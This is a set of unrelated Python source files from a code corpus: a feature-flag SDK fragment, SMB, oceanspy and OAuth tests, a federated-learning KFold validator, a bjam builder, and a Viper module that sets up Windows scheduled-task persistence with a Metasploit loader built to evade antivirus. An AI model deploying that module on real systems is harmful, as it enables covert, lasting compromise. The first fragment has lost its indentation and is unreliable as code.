def override_config(self, config:str, value:object, user_id:str = None):
self._evaluator.override_config(config, value, user_id)
def override_experiment(self, experiment:str, value:object, user_id:str = None):
self._evaluator.override_config(experiment, value, user_id)
def evaluate_all(self, user:object):
all_gates = dict()
for gate in self._evaluator.get_all_gates():
result = self.__check_gate_server_fallback(user, gate, False)
all_gates[gate] = {
"value": result.boolean_value,
"rule_id": result.rule_id
}
all_configs = dict()
for config in self._evaluator.get_all_configs():
result = self.__get_config_server_fallback(user, config, False)
all_configs[config] = {
"value": result.json_value,
"rule_id": result.rule_id
}
return dict({
"feature_gates": all_gates,
"dynamic_configs": all_configs
})
def __check_gate_server_fallback(self, user:object, gate_name:str, log_exposure=True):
user = self.__normalize_user(user)
result = self._evaluator.check_gate(user, gate_name)
if result.fetch_from_server:
network_gate = self._network.post_request("check_gate", {
"gateName": gate_name,
"user": user.to_dict(True),
"statsigMetadata": self.__statsig_metadata,
})
if network_gate is None:
return _ConfigEvaluation()
return _ConfigEvaluation(boolean_value=network_gate.get("value"), rule_id=network_gate.get("rule_id"))
elif log_exposure:
self._logger.log_gate_exposure(
user, gate_name, result.boolean_value, result.rule_id, result.secondary_exposures)
return result
def __get_config_server_fallback(self, user:object, config_name:str, log_exposure=True):
user = self.__normalize_user(user)
result = self._evaluator.get_config(user, config_name)
if result.fetch_from_server:
            network_config = self._network.post_request("get_config", {
                "configName": config_name,
                "user": user.to_dict(True),
                "statsigMetadata": self.__statsig_metadata,
            })
if network_config is None:
return _ConfigEvaluation()
return _ConfigEvaluation(json_value=network_config.get("value", {}), rule_id=network_config.get("ruleID", ""))
elif log_exposure:
self._logger.log_config_exposure(
user, config_name, result.rule_id, result.secondary_exposures)
return result
def __normalize_user(self, user):
if self._options is not None and self._options._environment is not None:
user._statsig_environment = self._options._environment
return user
def _sync(self, sync_func, interval):
while True:
if self.__shutdown_event.wait(interval):
break
sync_func()
def _download_config_specs(self):
specs = self._network.post_request("download_config_specs", {
"statsigMetadata": self.__statsig_metadata,
"sinceTime": self._last_update_time,
})
if specs is None:
return
time = specs.get("time")
if time is not None:
self._last_update_time = time
if specs.get("has_updates", False):
self._evaluator.setDownloadedConfigs(specs)
def _download_id_list(self, list_name, list):
res = self._network.post_request("download_id_list", {
"listName": list_name,
"statsigMetadata": self.__statsig_metadata,
"sinceTime": list.get("time", 0),
})
if res is None:
return
ids = list.get("ids", dict())
for id in res.get("add_ids", []):
ids[id] = True
        for id in res.get("remove_ids", []):
            ids.pop(id, None)  # tolerate ids that were never added locally
new_time = res.get("time", 0)
if new_time > list.get("time", 0):
list["time"] = new_time
def _download_id_lists(self):
thread_pool = []
id_lists = self._evaluator.getIDLists()
for list_name, list in id_lists.items():
thread = threading.Thread(
target=self._download_id_list, args=(list_name, list, ))
thread.daemon = True
thread_pool.append(thread)
thread.start()
for thread in thread_pool:
thread.join()
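# Illustrative usage sketch (not part of the original module); the secret key
# is a placeholder and StatsigUser stands in for the SDK's user object:
#
#     server = StatsigServer()
#     server.initialize("secret-xxxxxxxx", StatsigOptions())
#     user = StatsigUser(user_id="a-user")
#     if server.check_gate(user, "my_gate"):
#         ...  # gate passed
#     server.shutdown()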
|
the-stack_106_30669 | # -*- coding: utf-8 -*-
'''
Test utility methods that communicate with SMB shares.
'''
from __future__ import absolute_import
import getpass
import logging
import os
import signal
import subprocess
import tempfile
import time
import salt.utils.files
import salt.utils.path
import salt.utils.smb
from tests.support.unit import skipIf
from tests.support.case import TestCase
log = logging.getLogger(__name__)
CONFIG = (
'[global]\n'
'realm = saltstack.com\n'
'interfaces = lo 127.0.0.0/8\n'
'smb ports = 1445\n'
'log level = 2\n'
'map to guest = Bad User\n'
'enable core files = no\n'
'passdb backend = smbpasswd\n'
'smb passwd file = {passwdb}\n'
'lock directory = {samba_dir}\n'
'state directory = {samba_dir}\n'
'cache directory = {samba_dir}\n'
'pid directory = {samba_dir}\n'
'private dir = {samba_dir}\n'
'ncalrpc dir = {samba_dir}\n'
'socket options = IPTOS_LOWDELAY TCP_NODELAY\n'
'min receivefile size = 0\n'
'write cache size = 0\n'
'client ntlmv2 auth = no\n'
'client min protocol = SMB3_11\n'
'client plaintext auth = no\n'
'\n'
'[public]\n'
'path = {public_dir}\n'
'read only = no\n'
'guest ok = no\n'
'writeable = yes\n'
'force user = {user}\n'
)
TBE = (
'{}:0:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:AC8E657F8'
'3DF82BEEA5D43BDAF7800CC:[U ]:LCT-507C14C7:'
)
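# TBE is a template smbpasswd entry for the test account; the embedded NT hash
# presumably matches the 'foo' password that the tests below pass to
# salt.utils.smb.get_conn.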
def which_smbd():
'''
Find the smbd executable and cache the result if it exits.
'''
if hasattr(which_smbd, 'cached_result'):
return which_smbd.cached_result
smbd = salt.utils.path.which('smbd')
if smbd:
which_smbd.cached_result = smbd
return smbd
@skipIf(not which_smbd(), 'Skip when no smbd binary found')
class TestSmb(TestCase):
_smbd = None
@staticmethod
def check_pid(pid):
try:
os.kill(pid, 0)
except OSError:
return False
else:
return True
@classmethod
def setUpClass(cls):
tmpdir = tempfile.mkdtemp()
cls.samba_dir = os.path.join(tmpdir, 'samba')
cls.public_dir = os.path.join(tmpdir, 'public')
os.makedirs(cls.samba_dir)
os.makedirs(cls.public_dir)
os.chmod(cls.samba_dir, 0o775)
os.chmod(cls.public_dir, 0o775)
passwdb = os.path.join(tmpdir, 'passwdb')
cls.username = getpass.getuser()
with salt.utils.files.fopen(passwdb, 'w') as fp:
fp.write(TBE.format(cls.username))
samba_conf = os.path.join(tmpdir, 'smb.conf')
with salt.utils.files.fopen(samba_conf, 'w') as fp:
fp.write(
CONFIG.format(
samba_dir=cls.samba_dir,
public_dir=cls.public_dir,
passwdb=passwdb,
user=cls.username,
)
)
cls._smbd = subprocess.Popen(
'{0} -FS -P0 -s {1}'.format(which_smbd(), samba_conf),
shell=True
)
time.sleep(1)
pidfile = os.path.join(cls.samba_dir, 'smbd.pid')
with salt.utils.files.fopen(pidfile, 'r') as fp:
cls._pid = int(fp.read().strip())
if not cls.check_pid(cls._pid):
raise Exception('Unable to locate smbd\'s pid file')
@classmethod
def tearDownClass(cls):
log.warning('teardown')
os.kill(cls._pid, signal.SIGTERM)
def test_write_file(self):
'''
Transfer a file over SMB
'''
name = 'test_write_file.txt'
content = 'write test file content'
share_path = os.path.join(self.public_dir, name)
assert not os.path.exists(share_path)
local_path = tempfile.mktemp()
with salt.utils.files.fopen(local_path, 'w') as fp:
fp.write(content)
conn = salt.utils.smb.get_conn('127.0.0.1', self.username, 'foo', port=1445)
salt.utils.smb.put_file(local_path, name, 'public', conn=conn)
conn.close()
assert os.path.exists(share_path)
with salt.utils.files.fopen(share_path, 'r') as fp:
result = fp.read()
assert result == content
def test_write_str(self):
'''
Write a string to a file over SMB
'''
name = 'test_write_str.txt'
content = 'write test file content'
share_path = os.path.join(self.public_dir, name)
assert not os.path.exists(share_path)
conn = salt.utils.smb.get_conn('127.0.0.1', self.username, 'foo', port=1445)
salt.utils.smb.put_str(content, name, 'public', conn=conn)
conn.close()
assert os.path.exists(share_path)
with salt.utils.files.fopen(share_path, 'r') as fp:
result = fp.read()
assert result == content
def test_delete_file(self):
'''
Validate deletion of files over SMB
'''
name = 'test_delete_file.txt'
content = 'read test file content'
share_path = os.path.join(self.public_dir, name)
with salt.utils.files.fopen(share_path, 'w') as fp:
fp.write(content)
assert os.path.exists(share_path)
conn = salt.utils.smb.get_conn('127.0.0.1', self.username, 'foo', port=1445)
salt.utils.smb.delete_file(name, 'public', conn=conn)
conn.close()
assert not os.path.exists(share_path)
def test_mkdirs(self):
'''
Create directories over SMB
'''
dir_name = 'mkdirs/test'
share_path = os.path.join(self.public_dir, dir_name)
assert not os.path.exists(share_path)
conn = salt.utils.smb.get_conn('127.0.0.1', self.username, 'foo', port=1445)
salt.utils.smb.mkdirs(dir_name, 'public', conn=conn)
conn.close()
assert os.path.exists(share_path)
def test_delete_dirs(self):
'''
        Validate deletion of directories over SMB
'''
dir_name = 'deldirs'
subdir_name = 'deldirs/test'
local_path = os.path.join(self.public_dir, subdir_name)
os.makedirs(local_path)
assert os.path.exists(local_path)
conn = salt.utils.smb.get_conn('127.0.0.1', self.username, 'foo', port=1445)
salt.utils.smb.delete_directory(subdir_name, 'public', conn=conn)
conn.close()
conn = salt.utils.smb.get_conn('127.0.0.1', self.username, 'foo', port=1445)
salt.utils.smb.delete_directory(dir_name, 'public', conn=conn)
conn.close()
assert not os.path.exists(local_path)
assert not os.path.exists(os.path.join(self.public_dir, dir_name))
def test_connection(self):
'''
Validate creation of an SMB connection
'''
conn = salt.utils.smb.get_conn('127.0.0.1', self.username, 'foo', port=1445)
conn.close()
|
the-stack_106_30674 | # Import modules
import subprocess
import urllib
import numpy as np
import pytest
import yaml
# Import oceanspy
from oceanspy.open_oceandataset import _find_entries, from_catalog, from_netcdf
# SCISERVER DATASETS
url = (
"https://raw.githubusercontent.com/hainegroup/oceanspy/"
"master/sciserver_catalogs/datasets_list.yaml"
)
f = urllib.request.urlopen(url)
SCISERVER_DATASETS = yaml.safe_load(f)["datasets"]["sciserver"]
# Directory
Datadir = "./oceanspy/tests/Data/"
# Urls catalogs
xmitgcm_url = "{}catalog_xmitgcm.yaml".format(Datadir)
xarray_url = "{}catalog_xarray.yaml".format(Datadir)
ECCO_url = "{}catalog_ECCO.yaml".format(Datadir)
hycom_url = "{}hycom_test.yaml".format(Datadir)
# Test SciServer
@pytest.mark.parametrize("names", [SCISERVER_DATASETS])
def test_find_entries(names):
for name in names:
_find_entries(name, None)
@pytest.mark.parametrize(
"name, catalog_url",
[
("xmitgcm_iters", xmitgcm_url),
("xmitgcm_no_iters", xmitgcm_url),
("xarray", xarray_url),
("error", xarray_url),
("grd_rect", xarray_url),
("grd_curv", xarray_url),
("LLC", ECCO_url),
("HYCOM", hycom_url),
],
)
def test_opening_and_saving(name, catalog_url):
if name == "error":
# Open oceandataset
with pytest.raises(ValueError):
from_catalog(name, catalog_url)
else:
# Open oceandataset
od1 = from_catalog(name, catalog_url)
# Check dimensions
if name not in ["xarray", "HYCOM"]:
dimsList = ["X", "Y", "Xp1", "Yp1"]
assert set(dimsList).issubset(set(od1.dataset.dims))
# Check coordinates
if name == "LLC":
coordsList = ["XC", "YC", "XG", "YG"]
elif name == "HYCOM":
coordsList = ["XC", "YC"]
else:
coordsList = ["XC", "YC", "XG", "YG", "XU", "YU", "XV", "YV"]
assert set(coordsList).issubset(set(od1.dataset.coords))
# Check NaNs
assert all(
[not np.isnan(od1.dataset[coord].values).any() for coord in coordsList]
)
if name == "LLC":
assert type(od1.face_connections["face"]) == dict
assert set(["face"]).issubset(set(od1.dataset.dims))
# Check shift
if name == "xmitgcm_iters":
sizes = od1.dataset.sizes
assert sizes["time"] - sizes["time_midp"] == 1
assert all(
[
"time_midp" in od1.dataset[var].dims
for var in od1.dataset.data_vars
if "ave" in var
]
)
# Save to netcdf
filename = "tmp.nc"
od1.to_netcdf(filename)
# Reopen
if name == "LLC":
args = {"decode_times": False}
else:
args = {}
from_netcdf(filename, **args)
# Clean up
subprocess.call("rm -f " + filename, shell=True)
|
the-stack_106_30676 | ##%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
## Implementing backward SFS on simulated process data
## %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
#%% read data
import numpy as np
VSdata = np.loadtxt('VSdata.csv', delimiter=',')
#%% separate X and y
y = VSdata[:,0]
X = VSdata[:,1:]
#%% scale data
from sklearn.preprocessing import StandardScaler
xscaler = StandardScaler()
X_scaled = xscaler.fit_transform(X)
yscaler = StandardScaler()
y_scaled = yscaler.fit_transform(y[:,None])
#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
## SFS-based variable selection
## %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
from sklearn.feature_selection import SequentialFeatureSelector
from sklearn.linear_model import LinearRegression
BSFS = SequentialFeatureSelector(LinearRegression(), n_features_to_select=10, direction='backward', cv=5).fit(X_scaled, y_scaled)
#%% check selected inputs
print('Inputs selected: ', BSFS.get_support(indices=True)+1) # returns integer index of the features selected
#%% reduce X to only top relevant inputs
X_relevant = BSFS.transform(X) |
the-stack_106_30677 | #
# Copyright 2019 The FATE Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import numpy as np
from sklearn.model_selection import KFold as sk_KFold
import copy
from arch.api import session
from arch.api.utils import log_utils
from federatedml.model_selection.cross_validate import BaseCrossValidator
from federatedml.model_selection.indices import collect_index
from federatedml.util import consts
from federatedml.evaluation.evaluation import Evaluation
from federatedml.transfer_variable.transfer_class.cross_validation_transfer_variable import CrossValidationTransferVariable
LOGGER = log_utils.getLogger()
class KFold(BaseCrossValidator):
def __init__(self):
super(KFold, self).__init__()
self.model_param = None
self.n_splits = 1
self.shuffle = True
self.random_seed = 1
def _init_model(self, param):
self.model_param = param
self.n_splits = param.n_splits
self.mode = param.mode
self.role = param.role
self.shuffle = param.shuffle
self.random_seed = param.random_seed
# self.evaluate_param = param.evaluate_param
# np.random.seed(self.random_seed)
def split(self, data_inst):
header = data_inst.schema.get('header')
data_sids_iter, data_size = collect_index(data_inst)
data_sids = []
key_type = None
for sid, _ in data_sids_iter:
if key_type is None:
key_type = type(sid)
data_sids.append(sid)
data_sids = np.array(data_sids)
# if self.shuffle:
# np.random.shuffle(data_sids)
kf = sk_KFold(n_splits=self.n_splits, shuffle=self.shuffle, random_state=self.random_seed)
n = 0
for train, test in kf.split(data_sids):
train_sids = data_sids[train]
test_sids = data_sids[test]
n += 1
train_sids_table = [(key_type(x), 1) for x in train_sids]
test_sids_table = [(key_type(x), 1) for x in test_sids]
# print(train_sids_table)
train_table = session.parallelize(train_sids_table,
include_key=True,
partition=data_inst._partitions)
train_data = data_inst.join(train_table, lambda x, y: x)
test_table = session.parallelize(test_sids_table,
include_key=True,
partition=data_inst._partitions)
test_data = data_inst.join(test_table, lambda x, y: x)
train_data.schema['header'] = header
test_data.schema['header'] = header
yield train_data, test_data
def run(self, component_parameters, data_inst, original_model, host_do_evaluate):
self._init_model(component_parameters)
if data_inst is None:
self._arbiter_run(original_model)
return
total_data_count = data_inst.count()
LOGGER.debug("data_inst count: {}".format(data_inst.count()))
if self.mode == consts.HOMO or self.role == consts.GUEST:
data_generator = self.split(data_inst)
else:
data_generator = [(data_inst, data_inst)] * self.n_splits
fold_num = 0
for train_data, test_data in data_generator:
model = copy.deepcopy(original_model)
LOGGER.debug("In CV, set_flowid flowid is : {}".format(fold_num))
model.set_flowid(fold_num)
model.set_cv_fold(fold_num)
LOGGER.info("KFold fold_num is: {}".format(fold_num))
if self.mode == consts.HETERO:
train_data = self._align_data_index(train_data, model.flowid, consts.TRAIN_DATA)
LOGGER.info("Train data Synchronized")
test_data = self._align_data_index(test_data, model.flowid, consts.TEST_DATA)
LOGGER.info("Test data Synchronized")
LOGGER.debug("train_data count: {}".format(train_data.count()))
if train_data.count() + test_data.count() != total_data_count:
raise EnvironmentError("In cv fold: {}, train count: {}, test count: {}, original data count: {}."
"Thus, 'train count + test count = total count' condition is not satisfied"
.format(fold_num, train_data.count(), test_data.count(), total_data_count))
this_flowid = 'train.' + str(fold_num)
LOGGER.debug("In CV, set_flowid flowid is : {}".format(this_flowid))
model.set_flowid(this_flowid)
model.fit(train_data, test_data)
this_flowid = 'predict_train.' + str(fold_num)
LOGGER.debug("In CV, set_flowid flowid is : {}".format(this_flowid))
model.set_flowid(this_flowid)
train_pred_res = model.predict(train_data)
# if train_pred_res is not None:
if self.role == consts.GUEST or host_do_evaluate:
fold_name = "_".join(['train', 'fold', str(fold_num)])
pred_res = train_pred_res.mapValues(lambda value: value + ['train'])
self.evaluate(pred_res, fold_name, model)
this_flowid = 'predict_validate.' + str(fold_num)
LOGGER.debug("In CV, set_flowid flowid is : {}".format(this_flowid))
model.set_flowid(this_flowid)
pred_res = model.predict(test_data)
model.set_predict_data_schema(pred_res, test_data.schema)
# if pred_res is not None:
if self.role == consts.GUEST or host_do_evaluate:
fold_name = "_".join(['validate', 'fold', str(fold_num)])
pred_res = pred_res.mapValues(lambda value: value + ['validate'])
self.evaluate(pred_res, fold_name, model)
LOGGER.debug("Finish fold: {}".format(fold_num))
fold_num += 1
LOGGER.debug("Finish all fold running")
return
def _arbiter_run(self, original_model):
for fold_num in range(self.n_splits):
LOGGER.info("KFold flowid is: {}".format(fold_num))
model = copy.deepcopy(original_model)
this_flowid = 'train.' + str(fold_num)
model.set_flowid(this_flowid)
model.set_cv_fold(fold_num)
model.fit(None)
this_flowid = 'predict_train.' + str(fold_num)
model.set_flowid(this_flowid)
model.predict(None)
this_flowid = 'predict_validate.' + str(fold_num)
model.set_flowid(this_flowid)
model.predict(None)
def _align_data_index(self, data_instance, flowid, data_application=None):
header = data_instance.schema.get('header')
if data_application is None:
# LOGGER.warning("not data_application!")
# return
raise ValueError("In _align_data_index, data_application should be provided.")
transfer_variable = CrossValidationTransferVariable()
if data_application == consts.TRAIN_DATA:
transfer_id = transfer_variable.train_sid
elif data_application == consts.TEST_DATA:
transfer_id = transfer_variable.test_sid
else:
raise ValueError("In _align_data_index, data_application should be provided.")
if self.role == consts.GUEST:
data_sid = data_instance.mapValues(lambda v: 1)
transfer_id.remote(data_sid,
role=consts.HOST,
idx=-1,
suffix=(flowid,))
LOGGER.info("remote {} to host".format(data_application))
return data_instance
elif self.role == consts.HOST:
data_sid = transfer_id.get(idx=0,
suffix=(flowid,))
LOGGER.info("get {} from guest".format(data_application))
join_data_insts = data_sid.join(data_instance, lambda s, d: d)
join_data_insts.schema['header'] = header
return join_data_insts
def evaluate(self, eval_data, fold_name, model):
if eval_data is None:
return
eval_obj = Evaluation()
# LOGGER.debug("In KFold, evaluate_param is: {}".format(self.evaluate_param.__dict__))
# eval_obj._init_model(self.evaluate_param)
eval_param = model.get_metrics_param()
eval_param.check_single_value_default_metric()
eval_obj._init_model(eval_param)
eval_obj.set_tracker(model.tracker)
eval_data = {fold_name: eval_data}
eval_obj.fit(eval_data)
eval_obj.save_data()
|
the-stack_106_30679 | # -*- coding: utf-8 -*-
# @File : PostMulitMsfBypassUAC.py
# @Date : 2019/3/15
# @Desc :
from Lib.ModuleAPI import *
class PostModule(PostMSFRawModule):
NAME_ZH = "Windows计划任务持久化"
DESC_ZH = "模块注册计划任务实现持久化,当前Session所在用户登录系统时执行载荷\n" \
"使用模块时请勿关闭对应监听,Loader启动需要回连监听获取核心库文件."
NAME_EN = "Windows scheduled task persistence"
DESC_EN = "The module adds scheduled tasks to achieve persistence, and the load.exe execute when the user of session login to the system\n" \
"When using the module, do not turn off the corresponding handler, the Loader needs to be connected back to the monitoring to obtain the core library files."
REQUIRE_SESSION = True
MODULETYPE = TAG2TYPE.Persistence
    PLATFORM = ["Windows"]  # Platform
    PERMISSIONS = ["User", "Administrator", "SYSTEM", ]  # Required permissions
    ATTCK = ["T1053"]  # ATT&CK vector
README = ["https://www.yuque.com/vipersec/module/iprzfo"]
REFERENCES = ["https://attack.mitre.org/techniques/T1053/"]
AUTHOR = "Viper"
OPTIONS = register_options([
OptionHander(),
OptionFileEnum(ext=['exe'], required=False),
OptionCacheHanderConfig(),
])
def __init__(self, sessionid, ipaddress, custom_param):
super().__init__(sessionid, ipaddress, custom_param)
self.type = "exploit"
self.mname = "windows/local/persistence_s4u_persistence_api"
    def check(self):
        """Pre-execution check run before the module executes."""
session = Session(self._sessionid)
if session.is_windows:
pass
else:
return False, "此模块只支持Windows的Meterpreter", "This module only supports Meterpreter for Windows"
if 'windows' not in self.get_handler_payload().lower():
return False, "选择handler错误,请选择windows平台的监听", "Select the handler error, please select the handler of the windows platform"
self.set_payload_by_handler()
filepath = self.get_fileoption_filepath(msf=True)
        if filepath is None:  # no custom file given: persist with a loader generated from the handler
exe_filepath = self.generate_bypass_exe_file(template="REVERSE_HEX_BASE")
else:
Notice.send_info("使用自定义的loader进行持久化", "Use custom loader for persistence")
exe_filepath = filepath
self.set_msf_option("EXE::Custom", exe_filepath)
return True, None
def callback(self, status, message, data):
        # Call the parent class function to store the result (must be called)
if status:
self.log_info("模块执行完成", "Module operation completed")
self.log_good("计划任务详情", "Scheduled task details")
self.log_raw(data.get('psresult'))
self.log_good(f"EXE路径: {data.get('victim_path')}", f"EXE path: {data.get('victim_path')}")
self.log_good(f"用户下次登录时生效", "Take effect the next time the user login")
self.cache_handler()
else:
self.log_error("模块执行失败", "Module execution failed")
self.log_error(message, message)
|
the-stack_106_30682 | from __future__ import print_function, division
import string
import numpy as np
class GeneticAlgorithm():
"""An implementation of a Genetic Algorithm which will try to produce the user
specified target string.
Parameters:
-----------
target_string: string
The string which the GA should try to produce.
population_size: int
The number of individuals (possible solutions) in the population.
mutation_rate: float
The rate (or probability) of which the alleles (chars in this case) should be
randomly changed.
"""
def __init__(self, target_string, population_size, mutation_rate):
self.target = target_string
self.population_size = population_size
self.mutation_rate = mutation_rate
        self.letters = [" "] + list(string.ascii_letters)
def _initialize(self):
""" Initialize population with random strings """
self.population = []
for _ in range(self.population_size):
# Select random letters as new individual
individual = "".join(np.random.choice(self.letters, size=len(self.target)))
self.population.append(individual)
def _calculate_fitness(self):
""" Calculates the fitness of each individual in the population """
population_fitness = []
for individual in self.population:
# Calculate loss as the alphabetical distance between
# the characters in the individual and the target string
loss = 0
for i in range(len(individual)):
letter_i1 = self.letters.index(individual[i])
letter_i2 = self.letters.index(self.target[i])
loss += abs(letter_i1 - letter_i2)
fitness = 1 / (loss + 1e-6)
population_fitness.append(fitness)
return population_fitness
def _mutate(self, individual):
""" Randomly change the individual's characters with probability
self.mutation_rate """
individual = list(individual)
for j in range(len(individual)):
# Make change with probability mutation_rate
if np.random.random() < self.mutation_rate:
individual[j] = np.random.choice(self.letters)
# Return mutated individual as string
return "".join(individual)
def _crossover(self, parent1, parent2):
""" Create children from parents by crossover """
# Select random crossover point
cross_i = np.random.randint(0, len(parent1))
child1 = parent1[:cross_i] + parent2[cross_i:]
child2 = parent2[:cross_i] + parent1[cross_i:]
return child1, child2
def run(self, iterations):
# Initialize new population
self._initialize()
for epoch in range(iterations):
population_fitness = self._calculate_fitness()
fittest_individual = self.population[np.argmax(population_fitness)]
highest_fitness = max(population_fitness)
# If we have found individual which matches the target => Done
if fittest_individual == self.target:
break
# Set the probability that the individual should be selected as a parent
# proportionate to the individual's fitness.
parent_probabilities = [fitness / sum(population_fitness) for fitness in population_fitness]
# Determine the next generation
new_population = []
for i in np.arange(0, self.population_size, 2):
# Select two parents randomly according to probabilities
parent1, parent2 = np.random.choice(self.population, size=2, p=parent_probabilities, replace=False)
# Perform crossover to produce offspring
child1, child2 = self._crossover(parent1, parent2)
# Save mutated offspring for next generation
new_population += [self._mutate(child1), self._mutate(child2)]
print ("[%d Closest Candidate: '%s', Fitness: %.2f]" % (epoch, fittest_individual, highest_fitness))
self.population = new_population
print ("[%d Answer: '%s']" % (epoch, fittest_individual))
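# ---------------------------------------------------------------------------
# Minimal usage sketch (not part of the original module): the target string,
# population size and mutation rate below are illustrative assumptions only.
# ---------------------------------------------------------------------------
if __name__ == "__main__":
    ga = GeneticAlgorithm(target_string="Genetic Algorithm",
                          population_size=100,
                          mutation_rate=0.05)
    ga.run(iterations=1000)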
|
the-stack_106_30683 | from __future__ import print_function
import os
import shutil
import subprocess
import logging
import pyhhi.build.common.ver as ver
import pyhhi.build.common.bldtools as bldtools
from pyhhi.build.common.system import SystemInfo
class BjamBuilder(object):
"""The BjamBuilder class supports building a new bjam executable."""
def __init__(self, sys_info, top_dir, bb_version):
self._logger = logging.getLogger(__name__)
bjam_src_tree_list = []
self._sys_info = sys_info
self._bjam_src_dir = None
self._top_dir = top_dir
self._bb_version = bb_version
self._toolset = None
self._tmp_dirs = []
if self._sys_info.is_windows():
self._bjam_names = ('b2.exe', 'bjam.exe')
else:
self._bjam_names = ('b2', 'bjam')
if sys_info.is_windows():
build_script = 'build.bat'
else:
build_script = 'build.sh'
# the bjam source is supposed to come from the boost source tree.
assert bb_version is not None
boost_tools_dir = os.path.join(self._top_dir, 'tools')
bjam_src_tree_list.append(os.path.join(boost_tools_dir, 'build', 'src', 'engine'))
bjam_src_tree_list.append(os.path.join(boost_tools_dir, 'build', 'v2', 'engine'))
bjam_src_tree_list.append(os.path.join(boost_tools_dir, 'build', 'v2', 'engine', 'src'))
bjam_src_tree_list.append(os.path.join(boost_tools_dir, 'jam', 'src'))
for d in bjam_src_tree_list:
# check for the build script to figure out which source location holds the bjam source files.
if os.path.exists(os.path.join(d, build_script)):
self._bjam_src_dir = d
break
if self._bjam_src_dir is not None:
# create a new bldtools suitable to build bjam on this platform.
self._toolset = bldtools.BjamToolset(sys_info, bb_version)
def build(self, target_arch='x86_64'):
"""Builds the b2 executable from source and returns the full path to the executable."""
assert self._bjam_src_dir is not None
if self._sys_info.is_windows() and (ver.version_compare(self._bb_version, (1, 66, 0)) >= 0):
target_arch = 'x86'
# create a new list of temporary directories to be removed after the bjam executable has been installed.
self._tmp_dirs = []
bjam_bin_dir = os.path.join(self._bjam_src_dir, self._get_bjam_bin_dir_folder(target_arch))
self._tmp_dirs.append(bjam_bin_dir)
b2_prog_path = os.path.join(bjam_bin_dir, self._bjam_names[0])
bjam_prog_path = os.path.join(bjam_bin_dir, self._bjam_names[1])
bootstrap_dir = os.path.join(self._bjam_src_dir, 'bootstrap')
self._tmp_dirs.append(bootstrap_dir)
if os.path.exists(bootstrap_dir):
# in case a previous build failed to remove the temporary files, remove bootstrap completely.
shutil.rmtree(bootstrap_dir)
cur_dir = os.getcwd()
os.chdir(self._bjam_src_dir)
print("========================================================")
print("Start building bjam in", self._bjam_src_dir, "...")
print("========================================================")
build_script_args = []
if self._sys_info.is_windows():
build_script = os.path.join(self._bjam_src_dir, 'build.bat')
build_script_args.append(build_script)
bjam_toolset_arg = self._toolset.get_bjam_toolset(build_script_format=True)
build_script_args.append(bjam_toolset_arg)
if target_arch == 'x86_64':
# build.bat builds a 32 bit b2 executable by default but we prefer a native b2.
if bjam_toolset_arg in ['vc141', 'vc14']:
build_script_args.append('amd64')
else:
build_script_args.append('x86_amd64')
else:
build_script = os.path.join(self._bjam_src_dir, 'build.sh')
build_script_args.append(build_script)
retv = subprocess.call(build_script_args)
if retv != 0:
raise Exception("Building bjam failed. Please contact technical support.")
# restore the previous current working directory
os.chdir(cur_dir)
if os.path.exists(b2_prog_path):
return b2_prog_path
elif os.path.exists(bjam_prog_path):
return bjam_prog_path
else:
assert False
return None
def remove_tmp_files(self):
"""Removes all temporary files created by the bjam build script."""
for d in self._tmp_dirs:
if os.path.exists(d):
try:
shutil.rmtree(d)
except WindowsError as exc:
print("WARNING: ignoring spurious windows error [" + str(exc.winerror) + "]: " + exc.strerror + " raised by shutil.rmtree().")
if os.path.exists(d):
file_list = os.listdir(d)
if file_list:
print("The directory '" + d + "' is not empty for unknown reason: ", file_list)
self._tmp_dirs = []
def _get_bjam_bin_dir_folder(self, target_arch='x86_64'):
if self._sys_info.is_windows():
bin_dir = 'bin.nt' + target_arch
elif self._sys_info.is_linux():
bin_dir = 'bin.linux' + target_arch
elif self._sys_info.is_macosx():
bin_dir = 'bin.macosx' + target_arch
else:
assert False
return bin_dir
class BjamLauncher(object):
def __init__(self, sys_info=None, verbosity=1):
self._logger = logging.getLogger(__name__)
if sys_info is None:
sys_info = SystemInfo()
self._sys_info = sys_info
self._verbosity_level = verbosity
def get_optimal_number_bjam_jobs(self):
"""Returns the optimal number of bjam jobs."""
bjam_jobs = self._sys_info.get_number_processors()
if 'BJAM_MAX_JOBS' in os.environ:
bjam_max_jobs = int(os.environ['BJAM_MAX_JOBS'], 10)
if bjam_jobs > bjam_max_jobs:
bjam_jobs = bjam_max_jobs
assert bjam_jobs >= 1
return bjam_jobs
def launch(self, argv):
"""Launch a bjam build and block until it terminates."""
if self._verbosity_level > 0:
# assemble the bjam command line for logging purposes
joiner = ' '
cmd_line = joiner.join(argv)
print("Launching: " + cmd_line)
retv = subprocess.call(argv)
if retv < 0:
self._logger.debug("child was terminated by signal: %d", -retv)
else:
self._logger.debug("child returned: %d", retv)
return retv
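# ---------------------------------------------------------------------------
# Usage sketch (illustrative, not part of the original module): the b2
# arguments below are assumptions and would normally come from the caller.
# ---------------------------------------------------------------------------
# launcher = BjamLauncher(verbosity=1)
# jobs = launcher.get_optimal_number_bjam_jobs()
# launcher.launch(['b2', '-j{0}'.format(jobs), 'toolset=gcc', 'stage'])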
|
the-stack_106_30684 | from typing import List
from unittest.mock import AsyncMock
from urllib.parse import ParseResult, parse_qs, urlencode, urlparse
import pytest
from box import Box # type: ignore
from fastapi import FastAPI
from fastapi.testclient import TestClient
from pydantic.dataclasses import dataclass
from requests import Response # type: ignore
from spylib.oauth import OfflineToken, OnlineToken, init_oauth_router
from spylib.utils import JWTBaseModel, hmac, now_epoch
HANDLE = 'HANDLE'
SHOPIFY_API_KEY = 'API_KEY'
SHOPIFY_SECRET_KEY = 'SECRET_KEY'
TEST_STORE = 'test.myshopify.com'
